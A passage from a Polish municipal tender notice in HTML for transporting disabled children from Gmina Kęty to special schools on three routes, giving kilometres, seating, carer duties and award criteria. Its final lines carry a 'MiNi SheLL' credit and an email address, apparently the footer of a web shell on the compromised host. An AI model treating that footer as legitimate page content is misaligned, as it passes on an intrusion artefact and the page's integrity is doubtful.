Wykonawca zapewni niezależnie od kierowcy przewożonym dzieciom opiekuna.
Opiekunem winna być osoba pełnoletnia, sprawna fizycznie, nie karana, posiadająca pełną zdolność do czynności prawnych. 
Do obowiązków opiekuna należeć będzie w szczególności:
- opieka i nadzór podczas przewozu dzieci z Dworca MZK/PKS w Kętach do SOSW w Oświęcimiu,
- opieka i nadzór podczas przewozu dzieci z SOSW w Oświęcimiu na Dworzec MZK/PKS                  w Kętach (jeżeli wymagany jest osobisty odbiór dziecka przez rodzica/opiekuna prawnego np.                    z uwagi na wiek, to opieka i nadzór sprawowane są aż do momentu przekazania każdego z tych dzieci rodzicom/opiekunom prawnym).
- opieka i nadzór w czasie pokonywania przez dziecko drogi ze środka transportu do budynku SOSW w Oświęcimiu aż do momentu przekazania dziecka uprawnionemu do odbioru dziecka pracownikowi SOSW w Oświęcimiu oraz z budynku SOSW w Oświęcimiu od momentu przekazania dziecka przez uprawnionego pracownika SOSW w Oświęcimiu do środka transportu,
-zwracanie uwagi na zachowanie się dzieci podczas przewozu,
- utrzymywanie stałego kontaktu z Wydziałem Infrastruktury Społecznej Urzędu Gminy Kęty            w sprawach dotyczących zmian w organizacji przewozów,
- w przypadku stwierdzenia sytuacji zagrażającej dzieciom natychmiastowe poinformowanie Wykonawcy oraz Urzędu Gminy Kęty o tym fakcie.
Podczas transportu i opieki dzieci na Trasie nr 1 pełną odpowiedzialność za prawidłowe wykonanie usługi oraz za bezpieczeństwo dzieci będzie ponosił Wykonawca. Wykonawca zobowiązuje się do zapewnienia ubezpieczenia NW dla wszystkich przewożonych i objętych opieką dzieci, a Zamawiający nie ponosi żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu w wyniku, których nastąpi uszkodzenie ciała lub śmierć czy szkoda materialna spowodowana działalnością Wykonawcy.
Szczegółowy zakres przedmiotu zamówienia oraz warunki jego realizacji precyzują zapisy załącznika Nr 8 do SIWZ Wzór umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.34.00-7, 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia pojazdu zastępczego w przypadku awarii - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowożenie dzieci na trasie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II
Dowożenie dzieci na Trasie nr 2

Przedmiotem zamówienia Części II jest wykonanie zleconej pracy przewozowej w zakresie dowozu i opieki w czasie przewozu dzieci niepełnosprawnych z miejsc ich zamieszkania na terenie Gminy Kęty do i z placówek oświatowych na trasie: od miejsca wsiadania pierwszego dziecka do Specjalnego Ośrodka Szkolno-Wychowawczego w Kaczynie Filia w Kętach (w skrócie SOSW w Kaczynie Filia w Kętach) na os. 700-lecia 22 i Ośrodka Rewalidacyjno-Edukacyjno-Wychowawczego w Kozach (w skrócie OREW  w Kozach) ul. Nadbrzeżna 130 i z powrotem. Zamawiający szacuje, iż ilość km na Trasie nr 2 wyniesie w całym okresie realizacji zamówienia 13.440 km (słownie: trzynaście tysięcy czterysta czterdzieści kilometrów). 
Zaznaczamy, że przedmiot zamówienia nie obejmuje przejechanych kilometrów bez dzieci, tj, tzw. pustych kilometrów.
Kursy odbywać się będą we wszystkie dni nauki szkolnej, zgodnie z organizacją roku szkolnego 2016/2017  w danej placówce, na podstawie rozkładu jazdy przedłożonego przez Zamawiającego, zawierającego optymalny przebieg trasy oraz godziny przyjazdu/odjazdu z poszczególnych przystanków.
Liczba przewożonych dzieci wynosi do 6, w tym do 3 dzieci poruszających się na wózku inwalidzkim. Liczba ta może ulec zmianie w trakcie realizacji przedmiotu umowy. W przypadku gdy zmiana powodować będzie zwiększenie ilości przewożonych dzieci powyżej 6 Wykonawca zobowiązuje się do dowożenia zwiększonej liczby dzieci w sytuacji, gdy będzie dysponował odpowiednią liczbą wolnych miejsc w pojeździe którym realizuje zamówienie. Osoby przewożone na tej trasie muszą mieć zapewnione miejsca siedzące dla dzieci poruszających się samodzielnie w ilości min. 6 oraz min. 3 miejsc konstrukcyjnie przystosowanych do przewozu osób poruszających się na wózkach inwalidzkich. W przypadku gdy zmiana powodować będzie zmniejszenie ilości przewożonych dzieci, zmniejszeniu ulegnie również ilość kilometrów.
Wykonawca zapewni niezależnie od kierowcy przewożonym dzieciom opiekuna.
Opiekunem winna być osoba pełnoletnia, sprawna fizycznie, nie karana, posiadająca pełną zdolność do czynności prawnych. 
Do obowiązków opiekuna należeć będzie w szczególności:
- opieka i nadzór podczas przewozu dzieci z miejsc wsiadania do SOSW w Kaczynie Filia w Kętach i OREW w Kozach (opieka i nadzór sprawowane są od momentu przekazania przez rodzica/opiekuna prawnego każdego z dzieci).
- opieka i nadzór podczas przewozu dzieci z SOSW w Kaczynie Filii w Kętach i OREW w Kozach (opieka i nadzór sprawowane są do momentu przekazania każdego z dzieci rodzicom/opiekunom prawnym).
- opieka i nadzór w czasie pokonywania przez dziecko drogi ze środka transportu do budynku SOSW w Kaczynie Filii w Kętach i OREW w Kozach aż do momentu przekazania dziecka uprawnionemu do odbioru dziecka pracownikowi SOSW w Kaczynie Filii w Kętach i OREW                w Kozach i z budynku SOSW w Kaczynie Filii w Kętach i OREW w Kozach od momentu przekazania dziecka przez uprawnionego pracownika SOSW w Kaczynie Filii w Kętach i OREW w Kozach do środka transportu,
- zwracanie uwagi na zachowanie się dzieci podczas przewozu,
- utrzymywanie stałego kontaktu z Wydziałem Infrastruktury Społecznej Urzędu Gminy Kęty                 w sprawach dotyczących zmian w organizacji przewozów,
- w przypadku stwierdzenia sytuacji zagrażającej dzieciom natychmiastowe poinformowanie Wykonawcy oraz Urzędu Gminy Kęty o tym fakcie.
Podczas transportu i opieki dzieci na Trasie nr 2 pełną odpowiedzialność za prawidłowe wykonanie usługi oraz za bezpieczeństwo dzieci będzie ponosił Wykonawca. Wykonawca zobowiązuje się do zapewnienia ubezpieczenia NW dla wszystkich przewożonych i objętych opieką dzieci, a Zamawiający nie ponosi żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu w wyniku, których nastąpi uszkodzenie ciała lub śmierć czy szkoda materialna spowodowana działalnością Wykonawcy.
Szczegółowy zakres przedmiotu zamówienia oraz warunki jego realizacji precyzują zapisy załącznika Nr 8 do SIWZ Wzór umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.34.00-7, 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia pojazdu zastępczego w przypadku awarii - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dowożenie dzieci na trasie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ III
Dowożenie dzieci na Trasie nr 3

Przedmiotem zamówienia Części III jest wykonanie zleconej pracy przewozowej w zakresie dowozu i opieki w czasie przewozu dzieci niepełnosprawnych z miejsc ich zamieszkania na terenie Gminy Kęty do i z placówek oświatowych na trasie: od miejsca wsiadania pierwszego dziecka do Specjalnego Ośrodka Szkolno-Wychowawczego w Oświęcimiu (w skrócie SOSW w Oświęcimiu) i z powrotem. Zamawiający szacuje, iż ilość km na Trasie nr 3 wyniesie w całym okresie realizacji zamówienia 27.840 km (słownie: dwadzieścia siedem tysięcy osiemset czterdzieści kilometrów). 
Zaznaczamy, że przedmiot zamówienia nie obejmuje przejechanych kilometrów bez dzieci, tj, tzw. pustych kilometrów.
Kursy odbywać się będą we wszystkie dni nauki szkolnej, zgodnie z organizacją roku szkolnego 2016/2017  w danej placówce, na podstawie rozkładu jazdy przedłożonego przez Zamawiającego, zawierającego optymalny przebieg trasy oraz godziny przyjazdu/odjazdu z poszczególnych przystanków.
Liczba przewożonych dzieci wynosi do 11, w tym do 2 dzieci poruszających się na wózkach inwalidzkich. Liczba ta może ulec zmianie w trakcie realizacji przedmiotu umowy. W przypadku gdy zmiana powodować będzie zwiększenie ilości przewożonych dzieci powyżej 11 Wykonawca zobowiązuje się do dowożenia zwiększonej liczby dzieci w sytuacji, gdy będzie dysponował odpowiednią liczbą wolnych miejsc w pojeździe którym realizuje zamówienie. Osoby przewożone na tej trasie muszą mieć zapewnione miejsca siedzące dla dzieci poruszających się samodzielnie w ilości min. 9 oraz min. 2 miejsc konstrukcyjnie przystosowanych do przewozu osób poruszających się na wózkach inwalidzkich. W przypadku gdy zmiana powodować będzie zmniejszenie ilości przewożonych dzieci, zmniejszeniu ulegnie również ilość kilometrów.
Wykonawca zapewni niezależnie od kierowcy przewożonym dzieciom opiekuna.
Opiekunem winna być osoba pełnoletnia, sprawna fizycznie, nie karana, posiadająca pełną zdolność do czynności prawnych. 
Do obowiązków opiekuna należeć będzie w szczególności:
- opieka i nadzór podczas przewozu dzieci z miejsc wsiadania do SOSW w Oświęcimiu (opieka i nadzór sprawowane są od momentu przekazania przez rodzica/opiekuna prawnego każdego                     z dzieci).
- opieka i nadzór podczas przewozu dzieci z SOSW w Oświęcimiu (opieka i nadzór sprawowane są do momentu przekazania każdego z dzieci rodzicom/opiekunom prawnym).
- opieka i nadzór w czasie pokonywania przez dziecko drogi ze środka transportu do budynku SOSW w Oświęcimiu aż do momentu przekazania dziecka uprawnionemu do odbioru dziecka pracownikowi SOSW w Oświęcimiu i z budynku SOSW w Oświęcimiu od momentu przekazania dziecka przez uprawnionego pracownika SOSW w Oświęcimiu do środka transportu,
- zwracanie uwagi na zachowanie się dzieci podczas przewozu,
- utrzymywanie stałego kontaktu z Wydziałem Infrastruktury Społecznej Urzędu Gminy Kęty                   w sprawach dotyczących zmian w organizacji przewozów,
- w przypadku stwierdzenia sytuacji zagrażającej dzieciom natychmiastowe poinformowanie Wykonawcy oraz Urzędu Gminy Kęty o tym fakcie.
Podczas transportu i opieki dzieci na Trasie nr 3 pełną odpowiedzialność za prawidłowe wykonanie usługi oraz za bezpieczeństwo dzieci będzie ponosił Wykonawca. Wykonawca zobowiązuje się do zapewnienia ubezpieczenia NW dla wszystkich przewożonych i objętych opieką dzieci, a Zamawiający nie ponosi żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu w wyniku, których nastąpi uszkodzenie ciała lub śmierć czy szkoda materialna spowodowana działalnością Wykonawcy.
Szczegółowy zakres przedmiotu zamówienia oraz warunki jego realizacji precyzują zapisy załącznika Nr 8 do SIWZ Wzór umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.34.00-7, 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia pojazdu zastępczego w przypadku awarii - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com